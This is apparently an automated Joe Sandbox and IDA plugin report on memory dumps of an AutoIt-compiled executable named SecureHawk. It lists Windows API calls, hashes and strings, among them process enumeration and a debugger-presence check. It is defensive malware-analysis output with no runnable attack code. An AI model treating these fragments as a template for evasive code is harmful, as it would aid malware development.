                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                  • String ID:
                                  • API String ID: 1559183368-0
                                  • Opcode ID: 6144165ff69bcfd719b70aa37aa99b766954ae34ab2424f86f42b6890169cbb7
                                  • Instruction ID: c0ed50ce22b6648ec56bca86439c878d782e9282a6dbaa4f40acc08ee015360d
                                  • Opcode Fuzzy Hash: 6144165ff69bcfd719b70aa37aa99b766954ae34ab2424f86f42b6890169cbb7
                                  • Instruction Fuzzy Hash: 6051B770A00B05DBDF2E9F69C8805EE77B6AF89320F258729F835966D1D7709DD18B80
                                  APIs
                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002F52E6
                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002F534A
                                  • TranslateMessage.USER32(?), ref: 002F5356
                                  • DispatchMessageW.USER32(?), ref: 002F5360
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Message$Peek$DispatchTranslate
                                  • String ID:
                                  • API String ID: 1795658109-0
                                  • Opcode ID: c24566aea2e207f6da547a43f54a896ebee8832102472b7894a93f69d127e12d
                                  • Instruction ID: 084d8144a7905ec1d58b8eee5d83d0102831a06b6b3b1bf73a2ca8ebacad1aae
                                  • Opcode Fuzzy Hash: c24566aea2e207f6da547a43f54a896ebee8832102472b7894a93f69d127e12d
                                  • Instruction Fuzzy Hash: 3E31267092071A9BEB32CF689C45BB9B7ACAF11388F1101B9E7118B1D2D7F4A898D711
                                  APIs
                                  • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,002F1275,SwapMouseButtons,00000004,?), ref: 002F12A8
                                  • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,002F1275,SwapMouseButtons,00000004,?), ref: 002F12C9
                                  • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,002F1275,SwapMouseButtons,00000004,?), ref: 002F12EB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID: Control Panel\Mouse
                                  • API String ID: 3677997916-824357125
                                  • Opcode ID: 15fb13ba01add451bed958c3902c3bac9030fb0db5b0d94e55fafd794cd8b162
                                  • Instruction ID: 9fd6a9118d3f5f6b66d73383af7dc2e0648c98a0432a82f4917963043f45e953
                                  • Opcode Fuzzy Hash: 15fb13ba01add451bed958c3902c3bac9030fb0db5b0d94e55fafd794cd8b162
                                  • Instruction Fuzzy Hash: B41148B1A2021CFFDB218FA4DC84ABEBBACEF04784F5045A9E905D7110D3719E6497A0
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00353FDA
                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00353FE8
                                  • Process32NextW.KERNEL32(00000000,?), ref: 00354008
                                  • CloseHandle.KERNEL32(00000000), ref: 003540B2
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: 73f323ee8c41d1923d6f89c2de12f2752b0c9311ab9c1ecb6a0e7f8011171cbc
                                  • Instruction ID: 8a6f53b7fcd8fda069512613be3598d7776e60f92964cc13a1657e64d77d85bd
                                  • Opcode Fuzzy Hash: 73f323ee8c41d1923d6f89c2de12f2752b0c9311ab9c1ecb6a0e7f8011171cbc
                                  • Instruction Fuzzy Hash: 933171711083019BD30AEF50C895EAFBBE8AF95354F50092DF985871E1EB71E989CB52
                                  APIs
                                  • _memset.LIBCMT ref: 00305B58
                                    • Part of subcall function 003056F8: _memset.LIBCMT ref: 00305787
                                    • Part of subcall function 003056F8: _wcscpy.LIBCMT ref: 003057DB
                                    • Part of subcall function 003056F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003057EB
                                  • KillTimer.USER32(?,00000001,?,?), ref: 00305BAD
                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00305BBC
                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00340CFC
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                  • String ID:
                                  • API String ID: 1378193009-0
                                  • Opcode ID: 1e70043ef10145ece8b288465d35a6b8d028b417f0a1e5866f66efa6f4709a9f
                                  • Instruction ID: e498ef87d95cc3e47e12c336f1a7603254dc641b3baa559ca06ecefd05801bf8
                                  • Opcode Fuzzy Hash: 1e70043ef10145ece8b288465d35a6b8d028b417f0a1e5866f66efa6f4709a9f
                                  • Instruction Fuzzy Hash: 40218070A05784AFE7778B248895BEBBBECAF01308F04059DE69A5A181C3743989CB51
                                  APIs
                                    • Part of subcall function 003049C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,003027AF,?,00000001), ref: 003049F4
                                  • _free.LIBCMT ref: 0033FA84
                                  • _free.LIBCMT ref: 0033FACB
                                    • Part of subcall function 003029BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00302ADF
                                  Strings
                                  • Bad directive syntax error, xrefs: 0033FAB3
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: _free$CurrentDirectoryLibraryLoad
                                  • String ID: Bad directive syntax error
                                  • API String ID: 2861923089-2118420937
                                  • Opcode ID: 5baf4c8cb6d84b287170b166cb4d6daecd2cf2e87039648c496d13d3806c976b
                                  • Instruction ID: 251afa359632ae99a0c9b11cf9b09a7581b54b9528b3ab983d532a437fa4d785
                                  • Opcode Fuzzy Hash: 5baf4c8cb6d84b287170b166cb4d6daecd2cf2e87039648c496d13d3806c976b
                                  • Instruction Fuzzy Hash: C6916F71D10219AFCF1AEFA4D8919EEB7B8FF09310F54446AF815AF2A1DB309A45CB50
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: AU3! ?8$EA06
                                  • API String ID: 4104443479-2045752374
                                  • Opcode ID: ef4273c6c04c373f47991fcf4bd91078b94d76e2230c4773a291c87de9ec0ed9
                                  • Instruction ID: 431e64ee39433553c74309b50560027e7ea25d32f10ca1038e91c07a3175aef1
                                  • Opcode Fuzzy Hash: ef4273c6c04c373f47991fcf4bd91078b94d76e2230c4773a291c87de9ec0ed9
                                  • Instruction Fuzzy Hash: 65418BA1A051585BDF278B6488B17BF7FA58B45310F140075EB82EE2C2C7306F8487A2
                                  APIs
                                    • Part of subcall function 00304AB2: __fread_nolock.LIBCMT ref: 00304AD0
                                  • _wcscmp.LIBCMT ref: 00359C4E
                                  • _wcscmp.LIBCMT ref: 00359C61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: _wcscmp$__fread_nolock
                                  • String ID: FILE
                                  • API String ID: 4029003684-3121273764
                                  • Opcode ID: 063bd8df9fc222d92868d9ce15bbce4ac6ac653adac309ef69605683a6861c0b
                                  • Instruction ID: 644c5bed53e2678f2895d7b6e7af29cbd12bffe7523245e77656e8eb29e4b31c
                                  • Opcode Fuzzy Hash: 063bd8df9fc222d92868d9ce15bbce4ac6ac653adac309ef69605683a6861c0b
                                  • Instruction Fuzzy Hash: DC41D971A40219BADF229FA0DC45FEFBBFDDF45710F01046AFA00BB291D6719A4487A5
                                  APIs
                                  • _memset.LIBCMT ref: 003402AB
                                  • GetOpenFileNameW.COMDLG32(?), ref: 003402F5
                                    • Part of subcall function 003101AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00302A58,?,00008000), ref: 003101CF
                                    • Part of subcall function 003108F0: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 0031090F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Name$Path$FileFullLongOpen_memset
                                  • String ID: X
                                  • API String ID: 3777226403-3081909835
                                  • Opcode ID: 797216ba2ef812936d4b24d769c9f1164b35ed7318a9d264b61fe571856f3c50
                                  • Instruction ID: 17a3590306ea34648904b39e0b4626e5a59e5a9fc01a2014163521f6c70f9df1
                                  • Opcode Fuzzy Hash: 797216ba2ef812936d4b24d769c9f1164b35ed7318a9d264b61fe571856f3c50
                                  • Instruction Fuzzy Hash: 8621A170A05288ABDF469FD4C845BEE7BFC9F49304F00405AE404BB281DBF45A89CF91
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7f0abdde782f07ba836ac90efbc34556d3964990c384d91e0aa07dc9d24722af
                                  • Instruction ID: 6cd1f2ca13855d115d1cf2b23e0d503a5114ed3890207bfd2b11dfc9b40e4d25
                                  • Opcode Fuzzy Hash: 7f0abdde782f07ba836ac90efbc34556d3964990c384d91e0aa07dc9d24722af
                                  • Instruction Fuzzy Hash: 74F145B0A083019FC715DF29C484A6ABBE5FF88314F14892EF9999B355DB70E945CF82
                                  APIs
                                  • _memset.LIBCMT ref: 003059F9
                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00305A9E
                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00305ABB
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: IconNotifyShell_$_memset
                                  • String ID:
                                  • API String ID: 1505330794-0
                                  • Opcode ID: ca61aa925d7d6d3a42cf4f07d9ed3c23a9261d9664823468a2017469e15de2c5
                                  • Instruction ID: e2e3757accbf10363ee7ae9500c05b37d01e9276ac8324be6dd74d39160ec8b2
                                  • Opcode Fuzzy Hash: ca61aa925d7d6d3a42cf4f07d9ed3c23a9261d9664823468a2017469e15de2c5
                                  • Instruction Fuzzy Hash: 6E3173B06057018FD767DF24D895697BBF8FB48308F000E2EE69A8B291D775A948CF52
                                  APIs
                                  • __FF_MSGBANNER.LIBCMT ref: 00315883
                                    • Part of subcall function 0031A2CB: __NMSG_WRITE.LIBCMT ref: 0031A2F2
                                    • Part of subcall function 0031A2CB: __NMSG_WRITE.LIBCMT ref: 0031A2FC
                                  • __NMSG_WRITE.LIBCMT ref: 0031588A
                                    • Part of subcall function 0031A328: GetModuleFileNameW.KERNEL32(00000000,003B43BA,00000104,?,00000001,00310F33), ref: 0031A3BA
                                    • Part of subcall function 0031A328: ___crtMessageBoxW.LIBCMT ref: 0031A468
                                    • Part of subcall function 00313201: ___crtCorExitProcess.LIBCMT ref: 00313207
                                    • Part of subcall function 00313201: ExitProcess.KERNEL32 ref: 00313210
                                    • Part of subcall function 00318C88: __getptd_noexit.LIBCMT ref: 00318C88
                                  • RtlAllocateHeap.NTDLL(01220000,00000000,00000001,?,?,?,?,00310F33,?,0000FFFF), ref: 003158AF
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                  • String ID:
                                  • API String ID: 1372826849-0
                                  • Opcode ID: 1849904a438b597f9bc7fe7531681934fda15882a0098eafb3ef98f3977d0c18
                                  • Instruction ID: 4ce98c03e17b9561bbaf1ae24eb21246471e8cdc43e9bf1fb739ae422cf60783
                                  • Opcode Fuzzy Hash: 1849904a438b597f9bc7fe7531681934fda15882a0098eafb3ef98f3977d0c18
                                  • Instruction Fuzzy Hash: EA01DE36341B11DADA1F2764EC02AEB629CDFCE721F210526F511AE682DE709CC143A5
                                  APIs
                                  • _free.LIBCMT ref: 00359143
                                    • Part of subcall function 00312EB5: RtlFreeHeap.NTDLL(00000000,00000000,?,00319B84,00000000,00318C8D,003158F3,?), ref: 00312EC9
                                    • Part of subcall function 00312EB5: GetLastError.KERNEL32(00000000,?,00319B84,00000000,00318C8D,003158F3,?), ref: 00312EDB
                                  • _free.LIBCMT ref: 00359154
                                  • _free.LIBCMT ref: 00359166
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 144f5af94d943480d36d389951f06cd61afa83af8249d10b620ede2dc82f263b
                                  • Instruction ID: 9e1e332f255cc3c8de4b664b6fd25eda136b4e33b09a41f15d2a7a73cb9a9ceb
                                  • Opcode Fuzzy Hash: 144f5af94d943480d36d389951f06cd61afa83af8249d10b620ede2dc82f263b
                                  • Instruction Fuzzy Hash: 6BE012A1A02A1282CA296578B944FD313DC5F4C752715041EBD0ADB342CE34E9958574
                                  APIs
                                  • GetCurrentProcess.KERNEL32(0000002C,00000000,?,00000002,00000000,?,00356E83,00000000,?,00356F77,00000000,00000000,00332E79), ref: 003570A4
                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00356E83,00000000,?,00356F77,00000000,00000000,00332E79), ref: 003570AC
                                  • DuplicateHandle.KERNELBASE(00000000,?,00356E83,00000000,?,00356F77,00000000,00000000,00332E79), ref: 003570B3
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: CurrentProcess$DuplicateHandle
                                  • String ID:
                                  • API String ID: 1294930198-0
                                  • Opcode ID: 4e9e50caf9dd3ff200725611307e209bbaaadbc00c990a6c4afc2dffb434cf3c
                                  • Instruction ID: 848ea3c55f6ffdd21de1f46695696081d11bc346f7fd5f2264eba9c5a44457dc
                                  • Opcode Fuzzy Hash: 4e9e50caf9dd3ff200725611307e209bbaaadbc00c990a6c4afc2dffb434cf3c
                                  • Instruction Fuzzy Hash: 45D0177A144305BBCB571BE5AC0DF6A7B7CDBC5B23F204459FA09861A09AB084085764
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: CALL
                                  • API String ID: 0-4196123274
                                  • Opcode ID: b2c2787b67626a2a6896d60396360685e4331602a451c9e5751ee486e84bb252
                                  • Instruction ID: eb7d697b8ea15a3dacd4ce882e15a06d4a6dfcda07a2bc320c0e88d8879812b9
                                  • Opcode Fuzzy Hash: b2c2787b67626a2a6896d60396360685e4331602a451c9e5751ee486e84bb252
                                  • Instruction Fuzzy Hash: BA3276705283159FC729DF14C495A6AFBE1FF84344F14896DEA8A8B362C771EC91CB82
                                  APIs
                                  • _strcat.LIBCMT ref: 0036DFD4
                                    • Part of subcall function 002F4D37: __itow.LIBCMT ref: 002F4D62
                                    • Part of subcall function 002F4D37: __swprintf.LIBCMT ref: 002F4DAC
                                  • _wcscpy.LIBCMT ref: 0036E063
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: __itow__swprintf_strcat_wcscpy
                                  • String ID:
                                  • API String ID: 1012013722-0
                                  • Opcode ID: 2163bd9f6c30bddef7d5bf999164b9b87b5db272cdabc497b03fd943410c4319
                                  • Instruction ID: 4c6722eb58655fc3267e045f57c6a25b4088169ac8c11c6ff1fe91da55b69f8e
                                  • Opcode Fuzzy Hash: 2163bd9f6c30bddef7d5bf999164b9b87b5db272cdabc497b03fd943410c4319
                                  • Instruction Fuzzy Hash: 78915A38A00508DFCB19DF18C5819AABBF5EF4A314B55C069E80A8F766DB30ED55DF81
                                  APIs
                                  • IsThemeActive.UXTHEME ref: 00305FEF
                                    • Part of subcall function 003134CE: __lock.LIBCMT ref: 003134D4
                                    • Part of subcall function 003134CE: DecodePointer.KERNEL32(00000001,?,00306004,00348675), ref: 003134E0
                                    • Part of subcall function 003134CE: EncodePointer.KERNEL32(?,?,00306004,00348675), ref: 003134EB
                                    • Part of subcall function 00305F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00305F18
                                    • Part of subcall function 00305F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00305F2D
                                    • Part of subcall function 00305240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0030526C
                                    • Part of subcall function 00305240: IsDebuggerPresent.KERNEL32 ref: 0030527E
                                    • Part of subcall function 00305240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 003052E6
                                    • Part of subcall function 00305240: SetCurrentDirectoryW.KERNEL32(?), ref: 00305366
                                  • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0030602F
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                  • String ID:
                                  • API String ID: 1438897964-0
                                  • Opcode ID: 9ccca9a3d4480344197d8b5179a1f48e2f25c2c5216d1696dc98ad8bd5e0dcbe
                                  • Instruction ID: f31d5f3d64ae8277377de0047ce48a10a741d8a80791bc841ca13e2a93d9c962
                                  • Opcode Fuzzy Hash: 9ccca9a3d4480344197d8b5179a1f48e2f25c2c5216d1696dc98ad8bd5e0dcbe
                                  • Instruction Fuzzy Hash: CD11A1719183019BC302EF65EC4695ABBFCEF84354F004A1EF2448B2A2DB749954CF91
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
